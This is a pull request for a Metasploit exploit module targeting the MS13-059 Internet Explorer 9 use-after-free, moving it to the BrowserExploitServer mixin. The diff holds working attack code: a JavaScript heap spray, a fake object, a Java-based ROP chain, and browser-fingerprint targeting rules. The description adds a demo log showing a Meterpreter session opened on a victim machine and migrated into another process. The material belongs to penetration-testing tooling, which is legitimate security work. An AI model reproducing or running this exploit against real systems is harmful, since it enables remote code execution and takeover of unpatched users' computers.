### PR TITLE
Use BrowserExploitServer for MS13-059 module

### DIFF
--- a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
+++ b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
@@ -8,16 +8,15 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Remote::HttpServer::HTML
-  include Msf::Exploit::RopDb
+  include Msf::Exploit::Remote::BrowserExploitServer
 
   def initialize(info={})
     super(update_info(info,
       'Name'           => "MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free",
       'Description'    => %q{
         This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9,
-        it seems to only affect certain releases of mshtml.dll. For example: This module
-        can be used against version 9.0.8112.16446, but not for 9.0.8112.16421. IE 8
+        it seems to only affect certain releases of mshtml.dll, ranging from a newly
+        installed IE9 (9.0.8112.16446), to 9.00.8112.16502 (July 2013 update). IE8
         requires a different way to trigger the vulnerability, but not currently covered
         by this module.
 
@@ -56,11 +55,19 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'ZDI', '13-195' ]
         ],
       'Platform'       => 'win',
+      'BrowserRequirements' =>
+        {
+          :source       => /script/i,
+          :os_name      => OperatingSystems::WINDOWS,
+          :ua_name      => HttpClients::IE,
+          :ua_ver       => "9.0",
+          :os_flavor    => "7",
+          :java         => /1\.6|6\.0/,
+          :mshtml_build => lambda { |ver| ver.to_i.between?(16446, 16490) } # May 17 mshtml to MS13-Jun
+        },
       'Targets'        =>
         [
-          # Vulnerable IE9 tested: 9.0.8112.16446
-          [ 'Automatic', {} ],
-          [ 'IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)', {} ]
+          [ 'Automatic', {} ]
         ],
       'Payload'        =>
         {
@@ -90,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
     obj << [rnd_dword].pack("V*")
     obj << [rnd_dword].pack("V*")
 
-    return obj
+    obj
   end
 
   # Target spray 0x20302020
@@ -110,31 +117,25 @@ class Metasploit3 < Msf::Exploit::Remote
       0x0c0c0c0c
     ].pack("V*")
 
-    p = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
-
-    return p
-  end
-
-  def is_win7_ie9?(agent)
-    (agent =~ /MSIE 9/ and agent =~ /Windows NT 6\.1/)
+    generate_rop_payload('java', code, {'pivot'=>stack_pivot})
   end
 
   # The meta-refresh seems very necessary to make the object overwrite more reliable.
   # Without it, it only gets about 50/50
-  def get_html(cli, req)
-    js_fake_obj = ::Rex::Text.to_unescape(get_fake_obj, ::Rex::Arch.endian(target.arch))
-    js_payload  = ::Rex::Text.to_unescape(get_payload, ::Rex::Arch.endian(target.arch))
+  def get_template
+    js_fake_obj = ::Rex::Text.to_unescape(get_fake_obj)
+    js_payload  = ::Rex::Text.to_unescape(get_payload)
 
-    html = %Q|
+    template = %Q|
     <html>
     <meta http-equiv="X-UA-Compatible" content="IE=7"/>
     <meta http-equiv="refresh" content="2"/>
     <head>
     <script language='javascript'>
-    #{js_property_spray}
+    <%=js_property_spray%>
 
-    var fake_obj = unescape("#{js_fake_obj}");
-    var s = unescape("#{js_payload}");
+    var fake_obj = unescape("<%=js_fake_obj%>");
+    var s = unescape("<%=js_payload%>");
 
     sprayHeap({shellcode:s});
 
@@ -148,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote
       document.execCommand('SelectAll');
       document.execCommand('InsertButton');
       sprayHeap({shellcode:fake_obj, heapBlockSize:0x10});
-      document.body.innerHTML = '#{Rex::Text.rand_text_alpha(1)}';
+      document.body.innerHTML = '<%=Rex::Text.rand_text_alpha(1)%>';
     }
     </script>
     </head>
@@ -156,16 +157,10 @@ class Metasploit3 < Msf::Exploit::Remote
     </html>
     |
 
-    html.gsub(/^ {4}/, '')
+    return template, binding()
   end
 
-  def on_request_uri(cli, request)
-    if is_win7_ie9?(request.headers['User-Agent'])
-      print_status("Sending exploit...")
-      send_response(cli, get_html(cli, request), {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
-    else
-      print_error("Not a suitable target: #{request.headers['User-Agent']}")
-      send_not_found(cli)
-    end
+  def on_request_exploit(cli, request, target_info)
+    send_exploit_html(cli, get_template)
   end
 end


### PR DESCRIPTION
This uses BrowserExploitServer for the MS13-059 module.
### Verification

Before you start processing this, you should make sure #3150 lands first, because if not, `os_detect` probably won't be able to recognize your IE 9 correctly. After that's landed, make sure you have the following setup:
- [x] Windows 7 SP1
- [ ] Internet Explorer 9. The vulnerable MSHTML file version (not the version you see in About) is between: May 17 2012 to Jun 2013. This one should be vulnerable: http://technet.microsoft.com/en-us/security/bulletin/ms13-may
- [x] Java 1.6 (for the ROP)

Demo:

```
msf exploit(ms13_059_cflatmarkuppointer) > [*] 10.0.1.90        ms13_059_cflatmarkuppointer - Gathering target information.
[*] 10.0.1.90        ms13_059_cflatmarkuppointer - Sending response HTML.
[*] Sending stage (769536 bytes) to 10.0.1.90
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.90:50411) at 2014-03-27 00:58:06 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.90:50411) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2672)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3560
[+] Successfully migrated to process 
```
